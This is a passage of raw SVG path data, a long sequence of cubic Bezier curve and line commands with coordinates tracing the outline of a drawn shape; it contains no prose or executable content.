34.383058,109.81078 C 34.787295,110.46485 34.614919,111 34,111 C 33.385081,111 33.140058,111.4176 33.455504,111.928 C 33.77095,112.43841 33.122507,113.14373 32.014521,113.49539 C 30.906534,113.84705 30,114.57028 30,115.10257 C 30,115.69211 30.78169,115.65202 32,115 C 33.1,114.4113 34,114.24021 34,114.6198 C 34,114.9994 34.7875,114.61004 35.75,113.75457 C 36.7125,112.8991 39.236586,111.48181 41.35908,110.60504 C 43.979252,109.52268 45.040062,108.54678 44.663402,107.56522 C 44.307,106.63645 45.136097,105.66475 46.9822,104.84759 C 48.562656,104.14801 49.591065,103.10861 49.267553,102.53781 C 48.944041,101.96702 49.052478,101.83848 49.508523,102.25218 C 49.964569,102.66588 51.049215,102.37024 51.918848,101.59521 C 53.737293,99.974575 61.922915,97.589582 62.767608,98.434275 C 63.078757,98.745424 62.695833,99.013684 61.916667,99.030409 C 60.925857,99.051676 61.041798,99.376027 62.302358,100.1094 C 63.44252,100.77273 64.544736,100.81164 65.302358,100.2153 C 66.660387,99.146371 73,98.975957 73,100.00838 C 73,101.5353 83.919906,103.5488 89.75,103.09689 C 90.69342,103.02376 91,99.10765 91,87.129961 L 91,71.259922 L 86.75,70.18633 C 82.901525,69.214166 60.083775,67.33065 44.261048,66.679032 C 40.829625,66.537718 37.532747,65.932747 36.934652,65.334652 C 36.151392,64.551392 34.400023,64.74492 30.673603,66.026504 C 27.828122,67.005117 23.25,68.07736 20.5,68.409265 C 17.496623,68.771751 14.991088,69.69884 14.225567,70.730908 C 13.437639,71.793185 10.956316,72.676849 7.7255674,73.045728 L 2.5,73.642369 L 8,76.172626 C 11.025,77.564268 15.714437,78.996672 18.42097,79.355746 C 24.028844,80.099738 25.068279,80.712725 22.97104,82.03906 C 20.941428,83.322626 8.704501,83.287144 9.5,82 C 9.8399187,81.45 9.443034,81 8.618034,81 C 7.793034,81 6.8399187,81.45 6.5,82 C 6.1600813,82.55 4.7835237,83 3.440983,83 C 2.0984424,83 1,83.45 1,84 C 1,84.55 1.7015576,85 2.559017,85 C 3.4164763,85 3.859942,85.417602 3.5444962,85.928004 C 3.2290504,86.438406 3.7649928,87.051896 4.7354792,87.291317 C 6.3737546,87.695481 16.690028,87.497122 17.25,87.05069 C 17.3875,86.941069 18.562489,86.655014 19.861087,86.415011 C 21.572563,86.098702 22.075544,86.360752 21.689231,87.367466 C 21.396114,88.131319 21.636215,89.236215 22.222789,89.822789 C 22.978122,90.578122 22.444734,91.071514 20.394645,91.513852 C 18.80259,91.857362 16.435791,92.571184 15.135091,93.100125 C 13.834392,93.629065 11.975183,93.809511 11.003516,93.501116 C 9.9387747,93.16318 9.0036087,93.548213 8.6498094,94.470199 C 8.3269375,95.311589 7.3470888,96 6.4723678,96 C 5.5976468,96 5.1038313,96.358986 5.375,96.797746 C 5.6461687,97.236506 5.4664647,98.245244 4.9756578,99.039387 C 4.242335,100.22593 3.8530649,100.25088 2.7916408,99.179362 C 1.7350391,98.112716 1.8212364,97.694203 3.2653318,96.879451 C 4.2362644,96.331656 5.8343695,95.020783 6.8166766,93.9664 C 7.8205567,92.888861 9.893968,92.06536 11.551345,92.085921 C 15.598789,92.136135 21,90.940021 21,89.993489 C 21,88.718092 18.843387,88.358706 12.5,88.57702 C 4.2825696,88.859832 -1.2047343e-014,87.491171 2.1566082e-014,84.582163 C 4.3808232e-014,82.657259 0.84836051,82.115911 5.6821926,80.956293 C 10.056035,79.907024 11.45675,79.870249 11.765526,80.796578 C 11.986153,81.45846 13.329167,82 14.75,82 C 16.170833,82 17.035099,81.701766 16.670591,81.337257 C 15.627777,80.294443 2.7091127,75 1.2074166,75 C 0.1402633,75 0.17165735,74.685486 1.3571429,73.5 C 2.2206593,72.636484 4.6634737,72 7.1141202,72 C 10.078013,72 12.058052,71.35464 13.632627,69.875403 C 14.876468,68.706875 17.830472,67.354176 20.197078,66.869405 C 22.563685,66.384634 26.75,65.507988 29.5,64.921302 C 34.949264,63.758755 41.665601,63.675296 43.402164,64.748551 C 44.005313,65.121317 45.726306,65.29755 47.226594,65.14018 C 48.726882,64.982809 51.427152,65.34233 53.227195,65.939115 C 55.027238,66.5359 63.25,67.467729 71.5,68.009845 C 85.183695,68.909015 92.645195,69.745871 103.34138,71.581065 C 105.45414,71.943561 108.15414,71.77692 109.34138,71.210752 C 113.05976,69.437542 114.63708,69.157669 116.0368,70.022745 C 116.78229,70.483482 118.14564,70.45724 119.06647,69.964428 C 121.80871,68.496825 131.71449,67.260717 133.35883,68.180934 C 134.39106,68.758601 135.17891,68.50273 135.80328,67.387039 C 136.62807,65.91322 137.13187,66.017728 140.61229,68.38461 C 143.99574,70.685541 144.64401,70.832061 145.61024,69.514234 C 146.85449,67.817232 149.5737,67.501215 150.46884,68.949586 C 150.79162,69.471858 153.22151,69.642666 155.86858,69.329159 C 158.51566,69.015652 161.55446,69.226368 162.62147,69.797417 C 163.68848,70.368466 167.92266,71.098221 172.03075,71.419095 C 177.98845,71.884438 178.94348,71.783015 176.75,70.917918 C 173.24046,69.533773 173.24046,68.247906 176.75,67.716254 C 179.13987,67.35422 179.04165,67.278037 176,67.134519 C 174.075,67.04369 172.03494,66.638765 171.46654,66.234687 C 170.02244,65.208074 170.23529,62.478823 171.75,62.6 C 172.4375,62.655 175.325,62.7675 178.16667,62.85 C 184.49815,63.033817 183.92117,63.941826 176.81541,64.976505 C 171.71556,65.7191 171.84471,65.755994 180,65.88625 C 184.675,65.960919 190.3,66.326626 192.5,66.698933 C 196.11078,67.309986 196.25674,67.442437 194,68.06012 C 192.625,68.436467 189.62164,68.520413 187.32587,68.246669 C 185.0301,67.972924 181.4301,68.084237 179.32587,68.494031 C 176.10365,69.121553 175.81556,69.366939 177.5,70.049271 C 178.6,70.494858 181.66406,70.891058 184.30902,70.929715 C 187.00564,70.969127 188.86532,71.408906 188.54271,71.930902 C 187.49332,73.628841 189.40855,73.795146 199.37079,72.871134 C 206.97828,72.165529 209.61515,72.24731 210.87079,73.227802 C 212.29532,74.340168 212.33975,74.294812 211.22448,72.866783 C 210.17204,71.519207 210.21576,71.131183 211.47448,70.648168 C 213.25757,69.963929 216.19057,70.88264 215.54707,71.923841 C 215.10215,72.643733 220.24065,72.2618 222.97197,71.371963 C 224.26794,70.949752 224.26794,70.781101 222.97197,69.961518 C 221.90891,69.289227 222.6112,68.994425 225.5,68.900314 L 229.5,68.770002 L 225.93724,68.072855 C 222.39728,67.380169 216.44767,64 218.76839,64 C 219.43576,64 218.56915,62.65 216.84258,61 C 214.63235,58.887786 212.71151,58 210.35169,58 C 206.71785,58 206.11294,59.018919 208.54733,61.039284 C 209.74303,62.03162 209.81069,62.498965 208.84508,63.095746 C 207.2076,64.107763 205.72862,63.14958 206.36568,61.489425 C 206.76023,60.461265 205.26158,60.271796 199.36623,60.604509 C 194.10867,60.901227 192.06648,60.701449 192.53915,59.936647 C 193.01138,59.172562 191.82863,59.053111 188.59385,59.538197 C 184.58966,60.138663 184.05674,60.015723 184.59406,58.615483 C 185.33097,56.695133 185.49088,56.70917 178.79922,58.106815 C 175.63419,58.767876 172.39248,60.252801 170.75,61.793906 C 168.06795,64.310425 166.76483,63.696827 169.25,61.087605 C 170.27176,60.014841 170.04352,59.905465 168,60.488581 C 166.625,60.880934 165.00039,61.831512 164.38976,62.600975 C 163.77912,63.370439 162.20412,64.006891 160.88976,64.015313 C 159.57539,64.023735 157.86227,64.434288 157.08282,64.927652 C 156.15238,65.516588 154.44018,65.16787 152.09763,63.91234 C 150.13522,62.860553 147.17295,61.986316 145.51481,61.969591 C 142.98007,61.944025 142.7791,61.776629 144.25276,60.918355 C 145.57396,60.148876 147.20304,60.499006 150.86913,62.340373 C 154.03863,63.932323 156.21468,64.477986 157.11636,63.906923 C 157.87736,63.424959 159.52662,63.023735 160.78138,63.015313 C 162.03615,63.006891 163.29492,62.395024 163.57866,61.655609 C 163.8624,60.916194 167.47728,59.46886 171.61172,58.439312 C 178.31287,56.770607 178.93192,56.422309 177.31444,55.230751 C 176.16625,54.384908 173.78164,54.053012 170.8203,54.326881 C 168.24647,54.564914 164.34356,54.28001 162.14718,53.693763 C 159.33862,52.944116 156.78885,52.940197 153.55347,53.680556 C 151.02331,54.259539 148.73941,54.387374 148.47814,53.964633 C 147.69512,52.69767 159.15209,51.846775 164.11784,52.803092 C 166.65765,53.292216 170.08562,53.494278 171.73556,53.25212 C 173.38549,53.009961 176.12262,53.529169 177.81806,54.405915 C 179.5135,55.282662 181.76793,56 182.8279,56 C 183.88786,56 185.27676,56.628544 185.91432,57.396765 C 186.55189,58.164986 187.94312,58.56613 189.00594,58.288195 C 190.06877,58.01026 192.30222,58.258307 193.96918,58.83941 C 196.10371,59.583513 197,59.582042 197,58.834437 C 197,58.143028 198.56899,58.008197 201.5,58.447729 C 204.43044,58.887176 206,58.752384 206,58.061273 C 206,57.477573 206.87344,57 207.94098,57 C 209.00852,57 210.16008,56.55 210.5,56 C 211.18823,54.886427 218.28703,54.620367 219.33552,55.668848 C 219.70338,56.036715 219.21588,57.215248 218.25218,58.287811 C 216.57325,60.156399 216.59406,60.300758 218.75,61.740934 C 219.9875,62.56759 221,63.864057 221,64.621972 C 221,65.379887 221.3375,66.03344 221.75,66.07431 C 223.21972,66.219931 227.53606,66.996109 229.75,67.512898 C 232.22966,68.091713 232.84917,70 230.55742,70 C 229.65311,70 229.25855,70.746271 229.5,72 C 229.77509,73.428447 229.34689,74 228.0016,74 C 226.96564,74 225.83992,73.55 225.5,73 C 225.16008,72.45 224.34602,72.006891 223.69098,72.015313 C 222.95065,72.024831 223.04791,72.377259 223.94803,72.946717 C 224.90548,73.552446 223.8891,73.721317 220.94803,73.445169 L 216.5,73.027529 L 222,74.838446 C 225.025,75.83445 228.4,76.560687 229.5,76.452305 C 230.6,76.343923 233.13502,76.197816 235.13337,76.127623 C 237.8146,76.033444 238.89867,75.4955 239.27018,74.074818 C 239.62336,72.724265 239.35969,72.308479 238.38682,72.681807 C 237.62407,72.974501 237,72.787859 237,72.267048 C 237,70.507073 244.54891,68.639979 246.62594,69.886237 C 248.29046,70.884977 248.20997,70.964771 245.90608,70.599876 C 242.84136,70.11448 239.60117,71.58734 242.02803,72.362682 C 247.04094,73.964228 248.66031,73.925998 248.53382,72.209095 C 248.46315,71.249754 248.07629,69.932463 247.67415,69.281783 C 247.27201,68.631102 247.15653,66.921092 247.41753,65.48176 C 247.86805,62.997264 247.73029,62.901115 244.69604,63.582326 C 239.6411,64.717194 237,64.88524 237,64.072003 C 237,63.398306 233.8694,62.241228 227.23548,60.46301 C 222.67672,59.241038 229.00884,55.310436 236.96301,54.424736 C 243.36991,53.711327 246.34058,54.589632 245.7076,57.010153 C 245.39578,58.202524 245.8816,58.997282 247.1203,59.321208 C 248.35811,59.644903 248.79781,60.363331 248.39714,61.407459 C 247.71802,63.177203 248.75125,63.443163 250.9357,62.060903 C 251.93988,61.42548 252.07146,60.753825 251.37347,59.826215 C 250.82461,59.096797 250.40354,57.6 250.43777,56.5 C 250.49343,54.711273 251.29103,54.468455 257.98822,54.201382 C 262.10675,54.037142 266.57717,54.179029 267.92251,54.516687 C 270.26767,55.105285 270.19774,55.227638 266.22725,57.482921 C 263.67191,58.934382 261.24366,59.614975 259.88659,59.260093 C 258.37365,58.864449 257.91052,59.046207 258.40265,59.842476 C 259.25585,61.222988 258.06919,61.329472 256.05215,60.053395 C 254.91357,59.333072 255.16844,58.995829 257.24532,58.474565 C 258.69787,58.109997 260.33485,58.088916 260.88305,58.427719 C 261.43124,58.766521 263.36932,58.135568 265.18988,57.0256 L 268.5,55.007476 L 262,55.103418 C 254.8236,55.209344 251.45295,55.978668 251.49982,57.5 C 251.55555,59.309021 253.09056,61 254.677,61 C 255.53443,61 257.77354,62.35 259.65278,64 C 261.53203,65.65 263.55208,67 264.14179,67 C 264.73149,67 264.95496,67.675 264.63837,68.5 C 264.20334,69.633667 264.84883,70.019281 267.28138,70.078947 C 269.05162,70.122368 269.96278,70.376442 269.30618,70.643555 C 268.64957,70.910668 268.36767,71.794569 268.67973,72.607779 C 269.16652,73.876325 269.51422,73.844611 271.12762,72.384508 C 272.66499,70.993205 273.46356,70.890181 275.50406,71.819897 C 278.12384,73.013549 278.88567,74.977466 276.75,75.031803 C 276.04588,75.049718 276.34771,75.70478 277.44113,76.531803 C 280.01808,78.48091 281.15241,78.385567 280.79384,76.25 C 280.6245,75.241474 281.13555,74.484324 282,74.463001 C 282.825,74.442652 284.28472,73.976317 285.24383,73.426701 C 286.83693,72.513777 286.85364,72.236053 285.43713,70.2137 C 284.36594,68.684371 282.85984,68 280.56542,68 C 276.31219,68 270.42477,65.549309 269.61623,63.442307 C 269.20612,62.373554 270.15209,60.647907 272.35653,58.443468 L 275.72316,55.076835 L 288.36158,55.176082 C 296.90188,55.243147 301.00497,55.636014 301.01531,56.387665 C 301.02518,57.104653 301.30908,57.061617 301.81408,56.266582 C 302.33879,55.440514 304.72813,55.134794 309.04877,55.34089 C 314.43572,55.59785 316.68033,56.320214 322.65472,59.719584 C 327.60641,62.537045 330.12957,63.470432 330.84909,62.750911 C 331.95475,61.645246 338.32919,63.644873 337.59177,64.866056 C 337.38123,65.214725 339.26104,65.596593 341.76913,65.71465 C 347.34102,65.976923 349.36129,67.530429 345.91952,68.90613 C 344.54824,69.454238 344.17153,69.900689 345.05,69.936614 C 345.9025,69.971476 347.10079,69.49921 347.71287,68.887132 C 348.32494,68.275055 349.39758,68.127681 350.09649,68.559635 C 351.0377,69.141336 350.8658,69.541372 349.43362,70.102217 C 347.72731,70.770414 347.79389,70.875955 350,71 C 352.28892,71.128702 352.33113,71.20977 350.5,71.960152 C 348.64168,72.721676 348.69942,72.858374 351.3151,73.889867 C 352.8634,74.50044 355.3958,75 356.94265,75 C 358.48951,75 360.31531,75.675 361,76.5 C 361.68469,77.325 362.75229,78.00251 363.37244,78.005577 C 363.9926,78.008644 366.25685,78.498944 368.40411,79.095132 L 372.30821,80.17911 L 369.40411,82.553592 C 367.80685,83.859557 365.9375,84.944257 365.25,84.964037 C 364.5625,84.983817 364,85.45 364,86 C 364,87.869922 359.47731,87.008863 355.65436,84.411103 C 353.55892,82.98721 351.59886,82.067802 351.29869,82.367975 C 350.21457,83.452097 351.98021,86 353.81561,86 C 356.71496,86 359.65776,89.149432 360.19206,92.824188 C 360.62808,95.82298 360.47103,96.08577 358.5877,95.508811 C 352.65765,93.692145 352.44855,93.672917 353.75,95.063956 C 355.64667,97.091186 355.25233,98.088125 352.75,97.592072 C 351.5125,97.346754 347.575,96.60142 344,95.935774 C 340.425,95.270128 335.36159,93.440869 332.74798,91.870754 C 328.08131,89.067273 323.42284,88.323111 316.75267,89.315599 C 315.24164,89.540433 313.21664,89.139224 312.25267,88.424023 C 310.59678,87.195461 310.61043,87.041671 312.5,85.638846 C 313.82761,84.653223 316.17895,84.269337 319.49396,84.496996 C 322.24063,84.685626 325.0722,84.35504 325.78634,83.762361 C 326.71945,82.987948 327.41046,83.010462 328.24238,83.842382 C 329.11921,84.719206 328.86636,85 327.2,85 C 325.99,85 325,85.45 325,86 C 325,86.55 326.125,87 327.5,87 C 328.875,87 330,87.397516 330,87.883369 C 330,88.651783 332.80025,89.955673 335.33061,90.365478 C 335.78745,90.439465 336.77001,91.332562 337.51408,92.350138 C 338.25815,93.367714 339.29907,93.933201 339.82723,93.606777 C 340.3554,93.280353 342.39588,93.685291 344.36165,94.506639 C 348.78691,96.355631 351.66667,96.42024 351.66667,94.670532 C 351.66667,93.856936 350.84744,93.49767 349.5554,93.744658 C 348.27848,93.988757 346.68196,93.306052 345.51548,92.017107 L 343.58682,89.885962 L 346.54341,90.526696 C 348.16953,90.8791 350.175,91.292278 351,91.444871 C 351.825,91.597463 353.30691,92.065384 354.29313,92.484694 C 355.27935,92.904005 356.32831,93.005026 356.62415,92.709185 C 357.66422,91.669114 354.90849,88 353.08726,88 C 352.07396,88 350.68469,87.325 350,86.5 C 349.31531,85.675 348.13521,85 347.37756,85 C 345.81918,85 345.5998,83.180298 346.90895,81.113089 C 347.52245,80.144327 348.64845,79.9477 350.64363,80.460917 C 352.21463,80.865023 355.20385,81.227473 357.28632,81.266361 C 359.6835,81.311126 360.60072,81.642119 359.78632,82.168533 C 358.76035,82.831711 358.79681,83.190822 359.96646,83.942798 C 360.87587,84.527462 361.86048,84.530758 362.55847,83.951474 C 363.17752,83.437707 363.98011,83.313448 364.34201,83.675343 C 364.7039,84.037238 365,83.331776 365,82.10765 C 365,80.816235 364.56184,80.152761 363.9562,80.527073 C 363.3821,80.881882 362.18794,80.570939 361.3025,79.83609 C 360.41706,79.10124 359.42427,78.5 359.09631,78.5 C 358.76834,78.5 358.57549,78.273527 358.66776,77.996727 C 358.76002,77.719927 357.63502,77.475 356.16776,77.452445 C 353.1939,77.406731 341.73377,72.932892 342.53588,72.13079 C 342.81712,71.849548 341.7991,71.023281 340.27361,70.29464 C 338.74813,69.566 338.31087,69.196471 339.30194,69.473465 C 340.293,69.750459 340.84999,69.566303 340.53969,69.064228 C 340.2294,68.562153 340.76852,67.965572 341.73776,67.738494 C 342.70699,67.511416 341.8125,67.341544 339.75,67.361 C 337.6875,67.380457 336,67.768748 336,68.223868 C 336,68.678989 334.5375,68.271166 332.75,67.317596 C 330.9625,66.364025 329.275,65.558078 329,65.526603 C 328.725,65.495127 327.86797,65.069236 327.09549,64.580179 C 326.16868,63.993412 325.91586,64.054841 326.35216,64.760792 C 326.98103,65.77833 325.54657,65.481896 319.8192,63.410745 C 317.64714,62.625278 318.62991,59.955638 320.83276,60.657475 C 321.99872,61.028954 322.12819,60.919542 321.26336,60.293573 C 320.58321,59.801273 318.33321,59.598458 316.26336,59.842874 C 313.41808,60.178856 312.97007,60.453521 314.42689,60.968767 C 317.5018,62.056302 314.32924,62.763087 307.79252,62.446776 C 301.13009,62.124381 298.90979,61.189616 301.44136,59.77288 C 303.02406,58.887156 303.01579,58.728712 301.31977,57.443066 C 298.75794,55.501098 293,55.562222 293,57.531385 C 293,58.373646 292.35341,59.310888 291.56314,59.614144 C 290.77287,59.917399 290.3102,60.690776 290.53499,61.332759 C 291.15689,63.108907 288.62829,65.865317 286.55462,65.671722 C 285.54297,65.577275 284.52601,66.034944 284.29471,66.688764 C 283.98605,67.561235 286.73742,67.865711 294.63556,67.833118 C 300.55433,67.808693 306.24646,67.474456 307.28474,67.09037 C 309.2713,66.355493 319,68.885053 319,70.136456 C 319,71.426526 314.61345,72.340348 314.21135,71.134046 C 313.95137,70.354106 313.16965,70.468194 311.69461,71.50135 C 310.51782,72.325607 308.86762,72.964474 308.02749,72.921053 C 306.99944,72.867918 306.90871,72.677189 307.75,72.337719 C 309.75503,71.528673 309.18851,69.805393 307.13208,70.458079 C 306.10473,70.784149 304.15466,70.629102 302.79861,70.113531 C 301.44255,69.597959 299.77008,69.524067 299.08199,69.949326 C 298.19634,70.496691 298.43978,70.881741 299.91547,71.267643 C 301.06196,71.567458 302,72.30489 302,72.90638 C 302,74.464777 299.94268,74.258104 298.00566,72.505119 C 297.09715,71.682934 294.13672,70.751378 291.42692,70.434994 C 287.06963,69.926258 286.70053,70.02381 288.23446,71.278752 C 290.06118,72.773237 289.62274,74 287.2619,74 C 285.64019,74 283,76.388276 283,77.855247 C 283,79.857164 279.43592,79.500506 277,77.254827 C 275.00266,75.413475 274.7779,74.776007 275.88213,74.084359 C 276.95861,73.410093 276.77309,73.062758 275.04324,72.513724 C 273.40169,71.992716 272.43709,72.358647 271.34608,73.916291 L 269.86994,76.023781 L 266.85804,73.011891 C 265.2015,71.355351 262.89077,70 261.72308,70 C 260.06227,70 259.86341,69.73659 260.80977,68.790231 C 262.70507,66.894932 257.3047,62.667834 254.01179,63.469164 C 252.6303,63.805347 250.9375,64.137315 250.25,64.20687 C 248.62201,64.371575 248.62201,65.978746 250.25,66.070285 C 250.9375,66.108942 250.6,66.509382 249.5,66.960152 C 247.63785,67.723242 247.69194,67.855455 250.28469,68.878304 C 251.81627,69.482518 253.39127,69.928789 253.78469,69.870016 C 256.98228,69.392338 258.86146,70.189086 258.72763,71.965758 C 258.56827,74.081316 253.96774,76.547654 251.80082,75.679219 C 251.08537,75.392491 251.49838,75.122368 252.71862,75.078947 C 254.40169,75.019057 254.77892,74.577577 254.28138,73.25 C 253.68714,71.664381 253.79911,71.640898 255.47342,73 C 257.21053,74.410076 257.24105,74.371096 255.98242,72.349779 C 254.83692,70.510141 251.40454,70.042777 252.34712,71.854785 C 253.06604,73.236843 249.1621,75.686808 246.66513,75.420588 C 245.2167,75.266161 243.77614,75.553199 243.46388,76.058451 C 243.15161,76.563703 243.5945,76.709101 244.44806,76.381557 C 245.30163,76.054013 246.00012,76.171667 246.00027,76.643011 C 246.00063,77.792282 227.58928,77.463942 222.29405,76.220245 C 217.97549,75.205941 210.30938,75.357286 209.18767,76.478993 C 208.84131,76.825357 209.21989,77.568537 210.02896,78.130504 C 211.14806,78.907812 211.19945,79.274104 210.24377,79.661541 C 209.55284,79.941645 209.26965,80.627281 209.61445,81.185178 C 210.3617,82.394262 206.55222,80.449671 202.88891,77.752057 C 200.82597,76.232935 199.56638,76.004651 196.88891,76.664641 C 195.02501,77.124089 190.4954,77.275 186.82311,77 C 180.55153,76.530352 180.22837,76.388263 181.49967,74.659304 C 182.90079,72.753777 187,73.113119 187,75.141469 C 187,75.750213 189.86595,76.037589 194.25,75.868443 C 198.2375,75.714597 202.62147,75.97117 203.99216,76.438607 C 206.2949,77.223895 206.37257,77.153845 205.0141,75.516984 C 203.76174,74.007983 202.40242,73.823714 195.84083,74.273456 C 189.79638,74.687752 188.02205,74.499836 187.60028,73.400717 C 186.99404,71.820883 183.71704,71.555798 181.18426,72.881707 C 179.67562,73.671475 176.14614,73.262793 159.27489,70.344802 C 157.50107,70.03801 154.5808,70.299087 152.78538,70.924973 C 150.67617,71.660246 149.40357,71.710696 149.18918,71.067535 C 148.9789,70.436689 148.18693,70.490825 147.02678,71.215347 C 145.58276,72.117157 144.63394,71.990169 142.53363,70.61399 C 140.58673,69.338333 139.01483,69.072558 136.68553,69.625204 C 134.93349,70.04089 133.275,70.35408 133,70.321181 C 132.725,70.288281 130.925,69.978186 129,69.632079 C 126.8612,69.247532 126.02766,69.342551 126.85676,69.876397 C 127.69161,70.413942 127.82808,70.988216 127.21155,71.369256 C 126.66046,71.709847 125.94409,71.296692 125.61962,70.451132 C 125.14141,69.204936 124.62195,69.13196 122.87698,70.065841 C 119.84275,71.689708 115,72.320237 115,71.091428 C 115,70.525666 114.325,70.321791 113.5,70.638374 C 112.675,70.954956 112,71.774776 112,72.460196 C 112,73.858115 102.79393,73.413608 99.815741,71.87189 C 98.889399,71.392351 96.751899,71 95.065741,71 L 92,71 L 92,87 L 92,103 L 94.928571,103 C 96.539286,103 98.451786,103.59247 99.178571,104.3166 C 101.73155,106.86024 106.10676,109.3302 105.79905,108.05409 C 105.32778,106.09966 108.42442,104.63872 111.43614,105.39462 C 113.23802,105.84686 113.99622,106.56746 113.64185,107.49094 C 113.31963,108.33063 113.59469,108.70903 114.32387,108.42921 C 114.99598,108.1713 117.51146,109.79315 119.91382,112.03332 C 122.31619,114.27349 125.46158,116.34232 126.90358,116.63072 C 129.95299,117.2406 132.35141,121.24859 130.67196,122.92804 C 129.90935,123.69065 130.01844,124.00442 131.05,124.01531 C 132.28319,124.02834 132.27571,124.17557 131,125 C 129.70731,125.8354 129.73371,125.97149 131.19098,125.98469 C 132.12102,125.99311 133.17359,125.52815 133.53001,124.95144 C 134.35369,123.6187 137,125.65568 137,127.62244 C 137,128.87449 138.24444,129.44103 140.27079,129.11149 C 140.69473,129.04255 140.76909,130.07183 140.43605,131.39879 C 139.95453,133.31731 140.30868,133.97372 142.16526,134.60384 C 143.44937,135.03967 144.8375,135.30709 145.25,135.19813 C 145.6625,135.08916 146,135.5051 146,136.12244 C 146,136.85387 146.58942,136.76677 147.69196,135.87244 C 148.84162,134.93989 149.14322,134.90064 148.63294,135.75 C 148.2199,136.4375 148.28853,137 148.78544,137 C 149.28236,137 150.99641,138.13451 152.59446,139.52114 L 155.5,142.04228 L 204.73939,141.77114 C 240.84201,141.57234 254.09516,141.80358 254.41498,142.63787 C 254.65489,143.2637 256.57216,144.02361 258.67559,144.32658 C 260.77901,144.62954 264.42396,145.15364 266.77547,145.49126 C 270.16916,145.9785 271.57823,145.69032 273.60765,144.09398 C 276.40988,141.88975 281.18261,142.13738 284.07874,144.63726 C 284.94705,145.38677 286.3614,146 287.22175,146 C 288.54666,146 290.19506,148.28937 290.10185,150 C 290.05239,150.90774 293.44357,151.85824 297,151.93345 C 301.04301,152.01896 307.34565,155.48379 306.72539,157.27992 C 306.49311,157.95254 304.88972,158.41527 303.15203,158.31117 C 300.56638,158.15627 300,158.49584 300,160.20093 C 300,161.34415 299.2125,162.87245 298.25,163.59714 C 296.75763,164.7208 297.29593,164.8242 301.90656,164.29955 C 305.84426,163.85148 307.12064,163.99578 306.60463,164.83071 C 306.14237,165.57865 306.44574,165.76618 307.47745,165.37028 C 308.9105,164.82037 308.9069,164.65241 307.43909,163.57912 C 305.97485,162.50844 305.96905,162.27058 307.37859,161.10076 C 308.23615,160.38905 310.53127,159.65864 312.47886,159.47763 C 314.42645,159.29662 317.47795,158.70154 319.25997,158.15522 C 321.04199,157.6089 324.75,156.88344 327.5,156.54308 C 336.82204,155.38933 337.8137,154.98093 339.90665,151.43364 C 342.1878,147.56738 341.98339,147.30955 338.46482,149.61501 C 337.10917,150.50327 336,150.92305 336,150.54786 C 336,149.30855 343.44434,142.75504 346.5,141.30435 C 348.15,140.521 350.625,139.21368 352,138.3992 C 353.92496,137.25895 356.69015,137.03562 364.0217,137.42829 C 372.66777,137.89137 374.00121,137.71407 378.5217,135.5004 C 381.25977,134.15958 384.48594,133.04847 385.69098,133.03127 C 388.22953,132.99504 389.54844,131.45699 387.90955,130.4441 C 387.11351,129.95212 387.18156,129.4952 388.14324,128.875 C 389.27874,128.1427 389.27017,127.85201 388.09068,127.09252 C 387.31556,126.59341 386.00424,126.44488 385.17664,126.76246 C 384.19683,127.13845 383.92415,126.93174 384.39497,126.16994 C 385.40315,124.53867 382.68492,124.68698 378.34576,126.5 C 376.37125,127.325 374.02321,127.96447 373.12788,127.92105 C 371.77989,127.85568 371.75483,127.74208 372.98214,127.26034 C 373.79732,126.94037 375.06696,126.07589 375.80357,125.33929 C 376.54018,124.60268 378.34821,123.9478 379.82143,123.884 C 381.5147,123.81067 381.85627,123.59977 380.75,123.31067 C 379.7875,123.05915 379,122.42051 379,121.89149 C 379,121.29922 378.32757,121.27548 377.25,121.82969 C 375.05533,122.95845 373,122.2751 373,120.41667 C 373,119.6375 372.16974,119 371.15499,119 C 370.14023,119 368.49549,118.1 367.5,117 C 365.73808,115.05311 365.75388,114.9982 368.09501,114.93232 L 370.5,114.86464 L 368.25,113.77951 C 367.0125,113.18268 366,112.26499 366,111.7402 C 366,111.2154 365.30163,111.05401 364.44806,111.38156 C 363.55814,111.72305 363.15674,111.55541 363.50708,110.98855 C 363.8431,110.44485 363.61492,110 363,110 C 362.38508,110 362.16008,109.55 362.5,109 C 362.83992,108.45 362.64148,108 362.05902,108 C 361.47656,108 361,107.325 361,106.5 C 361,105.65234 360.10455,105 358.94098,105 C 357.80852,105 357.12291,105.38986 357.4174,105.86635 C 357.71189,106.34285 357.06345,107.53759 355.97642,108.52134 C 354.4573,109.89612 353.99646,109.98489 353.98469,108.90499 C 353.97395,107.9202 353.74896,107.84639 353.2324,108.65822 C 352.82706,109.29524 350.80346,110.13385 348.73551,110.5218 C 345.46803,111.13478 345.06024,111.0066 345.62183,109.54312 C 346.1844,108.07707 345.7653,107.94863 342.38403,108.55083 C 339.18565,109.12047 338.72066,109.00933 339.75,107.92129 C 341.69087,105.86973 341.22839,104.01012 338.75,103.90032 C 336.59959,103.80505 336.61066,103.767 339,103.04064 L 341.5,102.28065 L 338.6849,101.14032 C 337.1366,100.51315 335.40606,100 334.83927,100 C 334.27248,100 332.5731,99.120144 331.06286,98.044763 C 329.07866,96.631886 327.01066,96.16648 323.60761,96.366948 C 321.01746,96.519529 318.66958,96.274385 318.3901,95.822184 C 317.70669,94.716403 313.25884,94.772165 312.56476,95.895215 C 312.26046,96.387584 312.64817,97.034749 313.42634,97.33336 C 314.20451,97.631971 314.70971,98.691624 314.54902,99.688144 C 314.38833,100.68467 314.65136,101.99888 315.13355,102.60863 C 315.67601,103.29461 315.21814,104.72426 313.93254,106.35863 C 312.7898,107.81138 312.31997,109 312.88846,109 C 314.71758,109 318,113.30456 318,115.70326 C 318,118.17926 313.0051,121.98931 309.75,121.99626 C 308.7875,121.99832 308,122.45 308,123 C 308,123.55 308.40077,124 308.89059,124 C 309.90976,124 310.88565,130.65936 310.23599,133.1808 C 309.99068,134.13292 309.19534,134.62846 308.40146,134.32381 C 307.63066,134.02803 307,134.27004 307,134.86163 C 307,136.2378 303.75881,135.07978 302.70031,133.32541 C 302.26048,132.59644 301.32402,132 300.61929,132 C 298.83813,132 296.66667,127.60739 296.66667,124.00432 C 296.66667,121.10443 296.50736,120.99947 292.08333,120.98482 C 286.68019,120.96692 280.6053,119.23453 276.70489,116.59932 C 274.66793,115.22309 272.04212,114.69377 267.02419,114.64782 C 263.23711,114.61314 260.35322,114.2375 260.61554,113.81305 C 261.47743,112.41849 258.91056,108.89118 257.1869,109.10152 C 251.04758,109.85071 251.21298,103.99302 257.51965,97.316674 C 260.7745,93.87104 262.26825,92.950365 263.80991,93.439669 C 264.92189,93.792596 266.10109,93.645448 266.43036,93.112674 C 267.0026,92.186771 264.14233,90.76339 262.35356,91.083902 C 259.7665,91.547451 256,90.852789 256,89.912102 C 256,88.877066 